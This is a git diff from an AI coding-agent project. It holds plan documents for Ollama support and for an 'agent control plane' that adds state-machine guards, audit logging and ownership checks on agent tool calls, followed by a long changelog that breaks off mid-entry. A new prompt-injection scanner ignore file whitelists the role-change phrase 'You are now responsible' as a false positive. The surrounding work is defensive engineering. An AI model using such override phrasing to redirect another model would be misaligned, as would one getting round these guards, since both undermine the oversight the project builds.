+Available: +  llama3.1:8b        (4.7 GB) +  qwen2.5-coder:7b   (4.4 GB) +  deepseek-r1:8b     (4.9 GB) + +> /ollama pull codestral:22b +Pulling codestral:22b... +████████████████████████████░░░░ 78% (14.2 GB / 18.1 GB) +✓ codestral:22b ready + +> /model ollama/codestral:22b +Switched to codestral:22b (local, Ollama) +``` + +## Implementation Order + +1. **Phase 1** — Auto-discovery with OpenAI-compat routing. Biggest user impact, smallest risk. +2. **Phase 3** — Management UX (`/ollama` commands). Valuable even before native API. +3. **Phase 2** — Native `/api/chat` provider. Optimization over OpenAI-compat; do last. 
+ +## Core Changes Summary (minimal) + +| File | Change | +|------|--------| +| `packages/pi-ai/src/types.ts` | Add `"ollama"` to `KnownProvider`, `"ollama-chat"` to `KnownApi` (Phase 2) | +| `packages/pi-ai/src/env-api-keys.ts` | Add `"ollama"` → always returns `"ollama"` placeholder | +| `src/onboarding.ts` | Add `"ollama"` to provider picker | +| `src/wizard.ts` | Add `"ollama"` key mapping (no key required) | + +Everything else lives in `src/resources/extensions/ollama/`. + +## Risks & Mitigations + +| Risk | Mitigation | +|------|------------| +| Ollama not running — startup probe latency | 1.5s timeout; cache result; probe async so it doesn't block TUI paint | +| Model capabilities unknown | Known-model table + `/api/show` fallback + parameter_size estimation | +| Tool calling unreliable on small models | Detect param count; warn on <7B models | +| Ollama API changes between versions | Version detect via `/api/version`; stable endpoints only | +| Conflicts with `models.json` Ollama config | User config always wins; auto-discovered models merge beneath manual config | +| Extension disabled — no impact on core | Extension is additive; disabling removes all Ollama features cleanly | + +## Testing Strategy + +- Unit tests: `ollama-client.ts` with mocked fetch responses +- Unit tests: `ollama-discovery.ts` model capability parsing +- Unit tests: `ollama-provider.ts` message format mapping + NDJSON stream parsing +- Unit tests: `model-capabilities.ts` known model lookups +- Integration test: mock HTTP server simulating Ollama `/api/tags`, `/api/chat`, `/api/pull` +- Manual test: real Ollama instance with llama3.1, qwen2.5-coder, deepseek-r1 + +## Open Questions + +1. **Startup probe** — Probe Ollama on `session_start` (adds ~1.5s if not running) or lazy on first `/model`? **Recommendation: async probe on session_start (non-blocking), eager if `OLLAMA_HOST` is set.** +2. **Auto-start** — Try to launch Ollama if installed but not running? 
**Recommendation: no — too invasive. Show helpful message in `/ollama` status.** +3. **Vision support** — Support multimodal models (llava, etc.) in Phase 2 native API? **Recommendation: yes, detected via capabilities table.** +4. **Model refresh** — How often to re-probe Ollama for new models? **Recommendation: on `/ollama list`, on `/model` command, and every 5 min (existing TTL).** diff --git a/.plans/onboarding-detection-wizard.md b/.plans/onboarding-detection-wizard.md index 0f6d0044f..5d1e5a2e2 100644 --- a/.plans/onboarding-detection-wizard.md +++ b/.plans/onboarding-detection-wizard.md @@ -134,7 +134,7 @@ Quick filesystem scan (no heavy reads): ### Task 1.4: `isFirstEverLaunch(): boolean` -Returns `true` if `~/.gsd/` doesn't exist or has no `preferences.md`. +Returns `true` if `~/.gsd/` doesn't exist or has no `PREFERENCES.md`. --- @@ -298,7 +298,7 @@ Step 8: Advanced (collapsed by default, expandable) Step 9: Bootstrap .gsd/ structure - Creates .gsd/milestones/ - - Creates .gsd/preferences.md (from wizard answers) + - Creates .gsd/PREFERENCES.md (from wizard answers) - Creates .gitignore entries - Seeds CONTEXT.md with detected project signals - Commits "chore: init gsd" (if commit_docs enabled) diff --git a/.plans/preferences-wizard-completeness.md b/.plans/preferences-wizard-completeness.md index 5709d7f21..bb6a353d0 100644 --- a/.plans/preferences-wizard-completeness.md +++ b/.plans/preferences-wizard-completeness.md @@ -42,7 +42,7 @@ The `/gsd prefs wizard` currently only configures 6 of 18+ preference fields. 
Us - Added missing keys to `orderedKeys` in `serializePreferencesToFrontmatter()` ### Group 6: Update Template & Docs ✓ -- Updated `templates/preferences.md` with new fields +- Updated `templates/PREFERENCES.md` with new fields - Updated `docs/preferences-reference.md` with budget, notifications, git, hooks ### Group 7: Tests ✓ diff --git a/.plans/single-writer-engine-v3-control-plane.md b/.plans/single-writer-engine-v3-control-plane.md new file mode 100644 index 000000000..ad294ef55 --- /dev/null +++ b/.plans/single-writer-engine-v3-control-plane.md @@ -0,0 +1,396 @@ +# Single-Writer Engine v3: Agent Control Plane +# Plan: State machine guards + actor causation + reversibility +# Created: 2026-03-25 + +--- + +## Background + +v2 gave the engine **write discipline** — agents can't corrupt STATE.md directly, +every mutation goes through the DB, event log is append-only. + +What v2 did NOT give us: **behavioral control**. Agents can still: +- Complete a task twice (silent overwrite) +- Complete a slice with open tasks (if they bypass the slice status check) +- Complete a milestone in any status +- Re-plan already-completed slices/tasks +- Call any tool on any unit regardless of ownership +- Leave no trace of *who* did what or *why* + +This plan bundles three work streams that close those gaps together, since they +share infrastructure (WorkflowEvent schema, DB query surface, handler preconditions). + +--- + +## Work Streams + +### Stream 1 — State Machine Guards (P0) +Add precondition checks to all 8 tool handlers so invalid transitions return an +error instead of silently succeeding. + +### Stream 2 — Actor Identity + Persistent Audit Log (P1) +Extend `WorkflowEvent` with `actor_name` and `trigger_reason`. Flush the +in-process `workflow-logger` buffer to a persistent `.gsd/audit-log.jsonl` +after every tool invocation, so "who did what and why" is durable. + +### Stream 3 — Reversibility + Unit Ownership (P2) +Add `gsd_task_reopen` and `gsd_slice_reopen` tools. 
Add a unit-ownership +validation layer so an agent can only complete/reopen units it explicitly claimed. + +--- + +## Detailed Task Breakdown + +--- + +### Stream 1: State Machine Guards + +#### S1-T1: Add `getTask`, `getSlice`, `getMilestone` existence helpers to `gsd-db.ts` + +**Files:** `src/resources/extensions/gsd/gsd-db.ts` + +These are read-only DB helpers to confirm an entity exists and return its current +`status` field before any mutation. Each returns `null` if not found. + +```ts +getTask(taskId: string, sliceId: string): { status: string } | null +getSlice(sliceId: string, milestoneId: string): { status: string } | null +getMilestoneById(milestoneId: string): { status: string } | null +``` + +Note: `getSlice` may already exist — check before adding a duplicate. The audit +report references it in `complete-slice.ts` line 207 but only to list tasks. +Need a version that returns the slice row itself. + +--- + +#### S1-T2: Guard `complete-task.ts` — enforce valid transitions + +**File:** `src/resources/extensions/gsd/tools/complete-task.ts` + +Preconditions to add (before the transaction block): +1. `getMilestoneById(milestoneId)` → must exist, must NOT be `"complete"` or `"done"` +2. `getSlice(sliceId, milestoneId)` → must exist, must be `"pending"` or `"in_progress"` +3. `getTask(taskId, sliceId)` → if exists, status must be `"pending"` (not already `"complete"`) + +On failure: return `{ error: "" }` — do NOT throw. + +--- + +#### S1-T3: Guard `complete-slice.ts` — enforce valid transitions + +**File:** `src/resources/extensions/gsd/tools/complete-slice.ts` + +Preconditions to add: +1. `getSlice(sliceId, milestoneId)` → must exist, status must be `"pending"` or `"in_progress"` (not already `"complete"`) +2. `getMilestoneById(milestoneId)` → must exist, must NOT be `"complete"` +3. 
All tasks in slice must be `"complete"` (already enforced — keep it, add explicit slice-status check before this) + +--- + +#### S1-T4: Guard `complete-milestone.ts` — enforce valid transitions + +**File:** `src/resources/extensions/gsd/tools/complete-milestone.ts` + +Preconditions to add: +1. `getMilestoneById(milestoneId)` → must exist, status must be `"active"` (not already `"complete"`) +2. Keep existing all-slices-complete check +3. Add deep check: all tasks across all slices must also be `"complete"` (not just slice status) + +--- + +#### S1-T5: Guard `plan-task.ts` — block re-planning completed tasks + +**File:** `src/resources/extensions/gsd/tools/plan-task.ts` + +Preconditions to add: +1. `getSlice(sliceId, milestoneId)` → must exist, status must NOT be `"complete"` (already blocks planning on a closed slice) +2. If task exists (`getTask`), status must be `"pending"` — block re-planning a `"complete"` task + +--- + +#### S1-T6: Guard `plan-slice.ts` — block re-planning completed slices + +**File:** `src/resources/extensions/gsd/tools/plan-slice.ts` + +Preconditions to add: +1. `getSlice(sliceId, milestoneId)` → if exists, status must NOT be `"complete"` +2. `getMilestoneById(milestoneId)` → must exist, status must NOT be `"complete"` + +--- + +#### S1-T7: Guard `plan-milestone.ts` — block re-planning completed milestones + +**File:** `src/resources/extensions/gsd/tools/plan-milestone.ts` + +Preconditions to add: +1. If milestone exists (`getMilestoneById`), status must NOT be `"complete"` +2. Validate `depends_on` array: each referenced milestoneId must exist and be `"complete"` before this milestone can be planned + +--- + +#### S1-T8: Guard `reassess-roadmap.ts` — verify completedSliceId is actually complete + +**File:** `src/resources/extensions/gsd/tools/reassess-roadmap.ts` + +Gap: `completedSliceId` is accepted without confirming it is actually `"complete"` status. 
+Also: no check that milestone is still `"active"` (could reassess after milestone is done). + +Preconditions to add: +1. `getSlice(completedSliceId, milestoneId)` → status must be `"complete"` +2. `getMilestoneById(milestoneId)` → status must be `"active"` + +--- + +#### S1-T9: Guard `replan-slice.ts` — verify blockerTaskId exists and is complete + +**File:** `src/resources/extensions/gsd/tools/replan-slice.ts` + +Gaps: +- `blockerTaskId` is accepted without verifying it exists or is `"complete"` +- No check that slice is still `"in_progress"` (could replan after slice is complete) + +Preconditions to add: +1. `getSlice(sliceId, milestoneId)` → status must be `"in_progress"` or `"pending"`, NOT `"complete"` +2. `getTask(blockerTaskId, sliceId)` → must exist, status must be `"complete"` + +--- + +### Stream 2: Actor Identity + Persistent Audit Log + +#### S2-T1: Extend `WorkflowEvent` with actor identity and causation fields + +**File:** `src/resources/extensions/gsd/workflow-events.ts` + +Extend the `WorkflowEvent` interface: +```ts +export interface WorkflowEvent { +  cmd: string; +  params: Record<string, unknown>; +  ts: string; +  hash: string; +  actor: "agent" | "system"; +  actor_name?: string;     // ADD: e.g. "executor-agent-01", "gsd-orchestrator" +  trigger_reason?: string; // ADD: e.g. "plan-phase complete", "user invoked gsd_complete_task" +  session_id?: string;     // ADD: process.env.GSD_SESSION_ID if set +} +``` + +Update `appendEvent` to accept and persist these new optional fields. +Hash computation must remain stable (still hashes only `cmd + params`, not the new fields) +so fork detection isn't broken. + +--- + +#### S2-T2: Update all 8 tool handlers to pass actor identity to `appendEvent` + +**Files:** All 8 handlers in `src/resources/extensions/gsd/tools/` + +Each handler receives its inputs. 
Add a convention where params can include: +- `actor_name` (optional string) — caller passes their agent identity +- `trigger_reason` (optional string) — caller passes why this action was triggered + +If not provided, default to `actor_name: "agent"`, `trigger_reason: undefined`. + +Handlers pass these through to `appendEvent`. + +The tool schemas (in the MCP tool definitions) should expose `actor_name` and +`trigger_reason` as optional string params so agents can self-identify. + +--- + +#### S2-T3: Persist `workflow-logger` to `.gsd/audit-log.jsonl` + +**File:** `src/resources/extensions/gsd/workflow-logger.ts` + +Current behavior: `_buffer` is in-process memory, drained per-unit and dropped. +This means errors/warnings disappear across context resets. + +Change: After `_push()` writes to the in-process buffer, also append the entry +to `.gsd/audit-log.jsonl` (using `appendFileSync`). This requires the basePath +to be available — either pass it as a module-level setter (`setLogBasePath(path)`) +called at engine init, or accept it as a param on `logWarning`/`logError`. + +The audit log format should match `LogEntry` serialized as JSON + newline, +consistent with `event-log.jsonl`. + +--- + +#### S2-T4: Add `readAuditLog` helper to `workflow-logger.ts` + +**File:** `src/resources/extensions/gsd/workflow-logger.ts` + +Expose a read function so the auto-loop and diagnostics can surface persistent +audit entries without replaying the event log: + +```ts +export function readAuditLog(basePath: string): LogEntry[] +``` + +--- + +### Stream 3: Reversibility + Unit Ownership + +#### S3-T1: Add `updateTaskStatus` and `updateSliceStatus` DB helpers + +**File:** `src/resources/extensions/gsd/gsd-db.ts` + +If they don't already exist (check first): +```ts +updateTaskStatus(taskId: string, sliceId: string, status: string): void +updateSliceStatus(sliceId: string, milestoneId: string, status: string): void +``` + +These are the write primitives needed by reopen tools. 
+ +--- + +#### S3-T2: Implement `gsd_task_reopen` tool handler + +**New file:** `src/resources/extensions/gsd/tools/reopen-task.ts` + +Logic: +1. Validate `taskId`, `sliceId`, `milestoneId` are non-empty strings +2. `getTask(taskId, sliceId)` → must exist, status must be `"complete"` (can't reopen what isn't closed) +3. `getSlice(sliceId, milestoneId)` → must exist, status must NOT be `"complete"` (can't reopen a task inside a closed slice — too late) +4. `getMilestoneById(milestoneId)` → must exist, status must NOT be `"complete"` +5. In a transaction: `updateTaskStatus(taskId, sliceId, "pending")` +6. Append event: `cmd: "reopen_task"`, include `actor_name`, `trigger_reason` +7. Invalidate state cache + render projections + +--- + +#### S3-T3: Implement `gsd_slice_reopen` tool handler + +**New file:** `src/resources/extensions/gsd/tools/reopen-slice.ts` + +Logic: +1. Validate `sliceId`, `milestoneId` +2. `getSlice(sliceId, milestoneId)` → must exist, status must be `"complete"` +3. `getMilestoneById(milestoneId)` → must NOT be `"complete"` +4. In a transaction: `updateSliceStatus(sliceId, milestoneId, "in_progress")` + set all tasks back to `"pending"` +5. Append event: `cmd: "reopen_slice"` +6. Invalidate state cache + render projections + +--- + +#### S3-T4: Add unit ownership claim/check mechanism + +**New file:** `src/resources/extensions/gsd/unit-ownership.ts` + +Lightweight JSON file at `.gsd/unit-claims.json` mapping unit IDs to agent names: +```json +{ +  "M01/S01/T01": { "agent": "executor-01", "claimed_at": "2026-03-25T..." }, +  "M01/S01": { "agent": "executor-01", "claimed_at": "2026-03-25T..." } +} +``` + +Functions: +```ts +claimUnit(basePath, unitKey, agentName): void   // atomic write +releaseUnit(basePath, unitKey): void +getOwner(basePath, unitKey): string | null +``` + +`unitKey` format: `"<milestoneId>/<sliceId>/<taskId>"` for tasks, `"<milestoneId>/<sliceId>"` for slices. 
+ +--- + +#### S3-T5: Wire ownership check into `complete-task` and `complete-slice` + +**Files:** `complete-task.ts`, `complete-slice.ts` + +If `actor_name` is provided AND `.gsd/unit-claims.json` exists AND the unit is claimed: +- Verify `actor_name` matches the registered owner +- If mismatch: return `{ error: "Unit is owned by <owner>, not <actor_name>" }` +- If no claim file / unit is unclaimed: allow the operation (opt-in ownership) + +Ownership is enforced only when claims are present, keeping the feature opt-in. + +--- + +## Files Changed Summary + +| File | Change Type | +|------|-------------| +| `gsd-db.ts` | Add `getTask`, `getMilestoneById` existence helpers; add `updateTaskStatus`, `updateSliceStatus` | +| `workflow-events.ts` | Extend `WorkflowEvent` with `actor_name`, `trigger_reason`, `session_id` | +| `workflow-logger.ts` | Add persistent flush to `.gsd/audit-log.jsonl`; add `setLogBasePath`; add `readAuditLog` | +| `tools/complete-task.ts` | State machine guards + ownership check + actor passthrough | +| `tools/complete-slice.ts` | State machine guards + ownership check + actor passthrough | +| `tools/complete-milestone.ts` | State machine guards + deep task check | +| `tools/plan-task.ts` | Block re-planning complete tasks | +| `tools/plan-slice.ts` | Block re-planning complete slices | +| `tools/plan-milestone.ts` | Block re-planning complete milestones + depends_on validation | +| `tools/reassess-roadmap.ts` | Verify completedSliceId status + milestone status check | +| `tools/replan-slice.ts` | Verify blockerTaskId exists + slice status check | +| `tools/reopen-task.ts` | NEW — gsd_task_reopen handler | +| `tools/reopen-slice.ts` | NEW — gsd_slice_reopen handler | +| `unit-ownership.ts` | NEW — claim/release/check ownership | + +--- + +## Execution Order (Dependencies) + +``` +S1-T1 (DB helpers) + └── S1-T2 (complete-task guards) + └── S1-T3 (complete-slice guards) + └── S1-T4 (complete-milestone guards) + └── S1-T5 (plan-task guards) + └── S1-T6 (plan-slice 
guards) + └── S1-T7 (plan-milestone guards) + └── S1-T8 (reassess-roadmap guards) + └── S1-T9 (replan-slice guards) + └── S3-T1 (updateTask/SliceStatus helpers) ── S3-T2, S3-T3 + +S2-T1 (WorkflowEvent schema) + └── S2-T2 (handler actor passthrough) + +S2-T3 (audit-log flush) + └── S2-T4 (readAuditLog) + +S3-T4 (unit-ownership.ts) + └── S3-T5 (wire into complete-task/slice) +``` + +Parallelizable: +- All of Stream 1 (S1-T2 through S1-T9) can run in parallel once S1-T1 is done +- Stream 2 and Stream 3 are fully independent of Stream 1 + +--- + +## What Success Looks Like + +After this phase: + +1. **Double-complete** → returns `{ error: "Task T01 is already complete" }` instead of silently overwriting +2. **Complete slice with open tasks** → still blocked (was already caught), plus slice status guard added +3. **Re-plan closed work** → returns `{ error: "Cannot re-plan: slice S01 is already complete" }` +4. **Wrong agent completes task** → returns `{ error: "Unit M01/S01/T01 is owned by executor-01, not executor-02" }` +5. **Post-mortem** → `.gsd/audit-log.jsonl` has full trace with actor_name + trigger_reason across context resets +6. **Oops recovery** → `gsd_task_reopen` / `gsd_slice_reopen` without manual SQL surgery +7. **depends_on enforcement** → cannot plan M02 if M01 is not yet complete + +--- + +## Decisions + +1. **Ownership: opt-in** — enforced only when `.gsd/unit-claims.json` exists. Zero breaking change for existing workflows; teams adopt incrementally. + +2. **Slice reopen: reset all tasks to `"pending"`** — simpler invariant. If you're reopening a slice, you're re-doing the work. Partial resets create ambiguous state. + +3. **`trigger_reason`: caller-provided** — agents know *why* they acted; the engine can only know *what* was called. Default to `undefined` if not passed. + +4. **Session ID: engine-generated** — UUID generated once at engine startup, stored in module state in `workflow-events.ts`. No reliance on agents setting env vars correctly. 
+ +5. **Idempotency: fix in this phase** — convert `insertAssessment` and `insertReplanHistory` to upserts (keyed on `milestoneId+sliceId` and `milestoneId+sliceId+ts` respectively). Accumulating duplicate records on retry is a bug, not a feature. + +### Additional task from decision 5: +#### S1-T10: Convert `insertAssessment` and `insertReplanHistory` to upserts + +**File:** `src/resources/extensions/gsd/gsd-db.ts` + +- `insertAssessment`: upsert keyed on `(milestone_id, completed_slice_id)` — one assessment per completed slice per milestone +- `insertReplanHistory`: upsert keyed on `(milestone_id, slice_id, blocker_task_id)` — one replan record per blocker per slice diff --git a/.prompt-injection-scanignore b/.prompt-injection-scanignore new file mode 100644 index 000000000..b6cc73a03 --- /dev/null +++ b/.prompt-injection-scanignore @@ -0,0 +1,2 @@ +# False positives in GSD prompt templates — these are legitimate LLM instructions, not injection +src/resources/extensions/gsd/prompts/doctor-heal.md:You are now responsible diff --git a/CHANGELOG.md b/CHANGELOG.md index b67679841..6abef7517 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -6,6 +6,1009 @@ Format based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/). 
## [Unreleased] +## [2.67.0] - 2026-04-09 + +### Added +- **context**: implement R005 decision scope cascade and derive scope from slice metadata +- **M005**: Tiered Context Injection - relevance-scoped context with 65%+ reduction + +### Fixed +- **test**: align auto-loop test timers with updated session timeout +- **gsd**: repair CI after branch split +- **gsd**: repair CI after branch split +- **gsd**: repair CI after branch split +- **gsd**: fail closed for discussion gate enforcement +- **gsd**: harden auto merge recovery and session safety +- **gsd**: repair overlay, shortcut, and widget surfaces +- **gsd**: prevent stale workflow reconcile state writes +- **gsd**: align prompt contracts and validation flow +- **pi-tui**: harden input parsing and editor focus behavior +- **remote-questions**: cancel local TUI when remote answer wins the race +- **auto**: increase session timeout to 120s and treat timeout as recoverable pause (#3767) +- **ui**: apply anthropic-api display name to all model/provider UI surfaces +- **ui**: display 'anthropic-api' in GSD preferences wizard provider list +- **remote-questions**: race local TUI against remote channel instead of remote-only routing +- **ui**: display 'anthropic-api' in model selector to distinguish from claude-code +- **gates**: add mechanical enforcement for discussion question gates +- **prompts**: harden non-bypassable gates and exclude dot-folders from scanning +- **gsd**: ignore filename headings in parsePlan +- **providers**: match 'out of extra usage' error and respect claude-code provider in model resolution (#3772) +- **pi-ai**: recover XML parameters trapped in JSON strings +- **retry**: guard claude-code fallback to anthropic provider only +- **providers**: route Anthropic subscription users through Claude Code CLI (#3772) +- **claude-code**: use native Windows claude lookup +- **gsd**: suppress repeated preferences section warnings +- **gsd**: normalize described expected output paths +- **auto**: 
resilient transient error recovery — defer to Core RetryHandler and fix cmdCtx race + +## [2.66.1] - 2026-04-08 + +### Fixed +- **pi-tui**: revert contentCursorRow, use hardwareCursorRow as movement baseline +- **pi-tui**: use contentCursorRow for render movement baseline instead of cursorRow +- **gsd**: add logWarning to empty catch block in orphaned worktree cleanup +- **gsd**: add consecutiveFinalizeTimeouts to LoopState in journal tests +- **gsd**: add escalation and unit-detach guards to finalize timeout handlers +- **gsd**: add timeout guard around postUnitPreVerification to prevent auto-loop hang +- **gsd**: OS-specific keyboard shortcut hints via formatShortcut helper +- **subagent**: support list-style tools frontmatter +- clear autocomplete rows from content bottom +- parse annotated pre-exec file paths +- **gsd**: add orphaned milestone branch audit at auto-mode bootstrap + +## [2.66.0] - 2026-04-08 + +### Added +- **gsd**: add fast path for queued milestone discussion +- **gsd**: add /gsd show-config command +- **reactive**: graph diagnostics and subagent_model config +- **dispatch**: parallel research slices and parallel milestone validation +- **parallel**: worker model override for parallel milestone workers + +### Fixed +- **gsd**: validate depth verification answer before unlocking write-gate +- **gsd**: revert unknown artifact check to warn-and-proceed +- **gsd**: add missing cmd field to test base WorkflowEvent +- **gsd**: address remaining adversarial review findings for wave 3 +- **gsd**: detect concurrent event log growth during reconcile +- **gsd**: address adversarial review findings for wave 3 +- **gsd**: address adversarial review findings for wave 2 +- **gsd**: address adversarial review findings for wave 1 +- **gsd**: WAL-safe migration backup + stronger regression tests +- **gsd**: consistency and cleanup (wave 5/5) +- **gsd**: write safety — atomic writes and randomized tmp paths (wave 4/5) +- **gsd**: session and recovery robustness 
(wave 3/5) +- **gsd**: event log and reconciliation robustness (wave 2/5) +- **gsd**: critical state machine data integrity fixes (wave 1/5) +- **gsd**: critical state machine data integrity fixes (wave 1/5) +- **gsd**: remove ecosystem research stub and address adversarial review +- **gsd**: suppress model change notification in auto-mode unless verbose +- **gsd**: exclude task.files from checkTaskOrdering to prevent false positives +- **state**: skip ghost check for queued milestones in registry build +- **ci**: replace empty catch blocks and raw stderr with logWarning +- **logging**: add debugLog to empty catch in reopen-milestone +- **state-machine**: 9 resilience fixes + 86 regression tests (#3161) +- **gsd**: add incremental persistence to discuss prompts +- replace empty catch with logWarning for silent-catch-diagnostics test +- **test**: escape regex metacharacters in skip-by-preference pattern test +- **test**: search for numbered step definitions in prompt ordering test +- **test**: update notes loop test for notesVisible guard behavior +- **test**: update action count for note captures now included in results +- **test**: remove extraneous test file from wrong branch +- **test**: update worktree sync tests to use separate milestone IDs +- **gsd**: use valid LogComponent type for stale branch guard warning +- **test**: update rogue detection test for auto-remediation behavior +- **test**: update stuck-planning test to expect executing after reconciliation +- **test**: update file path consistency tests for inputs-only checking +- **test**: add CONTEXT file to queued milestone ghost detection test +- **test**: update needs-remediation test to expect validating-milestone phase +- **gsd**: import all-done milestones as complete during DB migration +- **gsd**: allow milestone completion when validation skipped by preference +- **gsd**: set slice sequence at all three insertion sites +- **gsd**: four prompt/runtime fixes for completion and session stability +- 
**gsd**: default insertMilestone status to queued instead of active +- **gsd**: suppress repeated frontmatter YAML parse warnings +- **gsd**: normalize list inputs in complete-task + fix roadmap dep parsing +- **gsd**: open DB before status derivation + respect isolation:none in quick +- **gsd**: add .bg-shell/ to baseline gitignore patterns +- **tui**: prevent Enter key infinite loop in interview notes mode +- **provider**: handle Enter key to initiate auth setup in provider manager +- **gsd**: cap run-uat dispatch attempts to prevent infinite replay loop +- **mcp**: use createRequire to resolve SDK wildcard subpath imports +- **gsd**: mark note captures as executed in executeTriageResolutions +- **gsd**: validate main_branch preference exists before using in merge +- **gsd**: handle deleted cwd in projectRoot to prevent ENOENT crash +- **gsd**: skip current milestone in syncWorktreeStateBack to prevent merge conflicts +- **gsd**: add structuredQuestionsAvailable conditional to slice discuss +- **gsd**: restore full tool set after discuss flow scoping +- **gsd**: tighten verifyExpectedArtifact to prevent rogue-write false positives +- **gsd**: add verification gate to complete-slice tool +- **gsd**: fix pre-execution-checks false positives from backticks and task.files +- **gsd**: stop renderAllProjections from overwriting authoritative PLAN.md +- **gsd**: auto-checkout to main when isolation:none finds stale milestone branch +- **gsd**: auto-remediate stale slice DB status when SUMMARY exists on disk +- **gsd**: open DB on demand in gsd_milestone_status for non-auto sessions +- **gsd**: detect phantom milestones from abandoned gsd_milestone_generate_id +- **gsd**: force re-validation when verdict is needs-remediation +- **gsd**: exclude closed slices from findMissingSummaries check +- **gsd**: recover from stale lockfile after crash or SIGKILL +- **gsd**: add createdAt timestamp and 30s age guard to staleness check +- **gsd**: clear stale pendingAutoStart after 
/clear interrupts discussion +- **gsd**: suppress misleading warnings for expected ENOENT/EISDIR conditions +- **gsd**: extract real error from message content when errorMessage is useless +- **gsd**: extract real error from message content when errorMessage is useless +- **gsd**: show accurate pause message for queued-user-message skip +- **gsd**: treat queued-user-message skip as non-retryable interruption +- **gsd**: recognize "Not provided." default in isVerificationNotApplicable +- **gsd**: discoverManifests skips symlinked extension directories +- **gsd**: recognize "Not provided." default in isVerificationNotApplicable +- **gsd**: reconcile plan-file tasks into DB when planner skips persistence (#3600) +- **gsd**: use isClosedStatus() in dispatch guard instead of raw complete check +- **browser-tools**: make sharp an optional lazy dependency +- **gsd**: pass required arguments in defer-milestone-stamp test +- **gsd**: replace remaining empty catch with logWarning +- **gsd**: use logWarning instead of raw stderr in catch blocks +- **gsd**: log error instead of empty catch in STATE.md rebuild +- **gsd**: log error instead of empty catch in skip_slice +- **gsd**: cast milestone classification to string for type safety +- **gsd**: treat zero-slice roadmap as pre-planning in guided flow +- **gsd**: rebuild STATE.md after skip-slice and strengthen rethink prompt +- **gsd**: use main_branch preference in worktree creation +- **gsd**: stamp defer and milestone captures as executed after triage +- **tui**: treat absolute file paths as plain text, not commands +- **tui**: break infinite re-render loop for images in cmux +- **gsd**: rebuild STATE.md before guided-flow dispatch +- **gsd**: defer queued shells in active milestone selection +- **retry**: prevent 429 quota cascade and 30-min lockout +- **gsd**: add fastPathInstruction to buildDiscussMilestonePrompt loadPrompt call + +### Changed +- auto-commit after quick-task +- auto-commit after quick-task +- auto-commit 
after quick-task +- auto-commit after quick-task +- auto-commit after quick-task +- auto-commit after quick-task +- auto-commit after quick-task + +## [2.65.0] - 2026-04-07 + +### Added +- **gsd**: persistent notification panel with TUI overlay, widget, and web API +- **gsd**: wire blocking behavior and strict mode for enhanced verification +- **gsd**: add post-execution cross-task consistency checks +- **gsd**: add pre-execution plan verification checks + +### Fixed +- **gsd**: wrap long notification messages and fit overlay to content +- **gsd**: remove background color from backdrop, fix message truncation +- **gsd**: restore consistent overlay height to prevent ghost artifacts +- **gsd**: improve notification overlay backdrop and content-fit sizing +- **gsd**: only unlink notification lock when owned, prevent foreign lock deletion +- **gsd**: add backdrop dimming and viewport padding to notification overlay +- **gsd**: add intent + phase guards to resume context fallback (#3615) +- **gsd**: inject task context for unstructured resume prompts (#3615) +- **pi-coding-agent**: restore extension tools after session switch (#3616) +- **agent-loop**: schema overload cap ignores bash execution errors (#3618) +- **bg-shell**: prevent signal handler accumulation + cap alert queue +- **gsd**: coerce plain-string provides field to array in complete-slice (#3585) +- address PR #3468 review findings +- **gsd**: persist autoStartTime across session resume so elapsed timer survives /exit +- **gsd**: add enhanced_verification preferences to mergePreferences +- **headless**: treat discuss and plan as multi-turn commands + +### Changed +- **interactive**: cap rendered chat components + kill orphan descendants +- **tui**: render-skip, frame isolation, Text cache guard, dispose + +## [2.64.0] - 2026-04-06 + +### Added +- **gsd**: add LLM safety harness for auto-mode damage control +- **ollama**: native /api/chat provider with full option exposure +- **parallel**: slice-level 
parallelism with dependency-aware dispatch (#3315) +- **mcp-client**: add OAuth auth provider for HTTP transport (#3295) + +### Fixed +- **ui**: remove 200-column cap on welcome screen width +- address adversarial review findings for #3576 +- **gsd**: replace hardcoded agent skill paths with dynamic resolution (#3575) +- **headless**: sync resources and use agent dir for query +- **cli**: show latest version and bypass npm cache in update check +- **gsd**: follow CONTRIBUTING standards for #3565 +- **gsd**: address Codex adversarial review findings for #3565 +- **gsd**: coerce string arrays to objects in complete-slice/task tools (#3565) +- **gsd**: harden flat-rate routing guard against alias/resolution gaps +- **pi-coding-agent**: register models.json providers and await Ollama probe in headless mode +- **ollama**: use apiKey auth mode to avoid streamSimple crash +- **gsd**: disable dynamic model routing for flat-rate providers +- **gsd**: address Codex adversarial review findings +- **gsd**: prevent LLM from querying gsd.db directly via bash (#3541) +- **gsd**: seed requirements table from REQUIREMENTS.md on first update +- **gsd**: inject S##-CONTEXT.md from slice discussion into all prompt builders +- **cli**: guard model re-apply against session restore and async rejection +- **pi-coding-agent**: resolve model fallback race that ignores configured provider (#3534) +- **detection**: add xcodegen and Xcode bundle support to project detection (#1882) +- **perf**: share jiti module cache across extension loads (#3308) +- **resource-sync**: prune removed bundled subdirectory extensions on upgrade (#1972) +- recognize U+2705 checkmark emoji as completion marker in prose roadmaps (#1897) +- **web**: use safePackageRootFromImportUrl for cross-platform package root (#1881) (#1893) +- isolate CmuxClient stdio to prevent TUI hangs in CMUX (#3306) +- worktree health check walks parent dirs for monorepo support (#3313) +- **gsd**: promote milestone status from queued to 
active in plan-milestone (#3317) +- **worktree**: correct merge failure notification command from /complete-milestone to /gsd dispatch complete-milestone (#1901) +- detect and block Gemini CLI OAuth tokens used as API keys (#3296) +- **auto**: break retry loop on tool invocation errors (malformed JSON) (#3298) +- **git**: use git add -u in symlink .gsd fallback to prevent hang (#3299) +- handle complete-slice context exhaustion to unblock downstream slices (#3300) +- cap consecutive tool validation failures to prevent stuck-loop (#3301) +- make enrichment tool params optional for limited-toolcall models (#3302) +- add filesystem safety guard to complete-slice.md (#3304) +- **extensions**: use bundledExtensionKeys for conflict detection instead of broken path heuristic (#3305) +- scope tools during discuss flows to prevent grammar overflow (#3307) +- **preferences**: warn on silent parse failure for non-frontmatter files (#3310) +- track remote-questions in managed-resources manifest (#3312) +- **auto**: add timeout guard for postUnitPostVerification in runFinalize (#3314) +- **gsd**: handle large markdown parameters in complete-milestone JSON parsing (#3316) +- **metrics**: deduplicate idle-watchdog entries and fix forensics false-positives (#1973) +- prevent milestone/slice artifact rendering corruption (#3293) +- **doctor**: strip --fix flag before positional parse (#1919) (#1926) +- resolve external-state worktree DB path (#2952) (#3303) +- **gsd**: worktree teardown path validation prevents data loss (#3311) +- prevent auto-mode from dispatching deferred slices (#3309) +- preserve completed slice status on 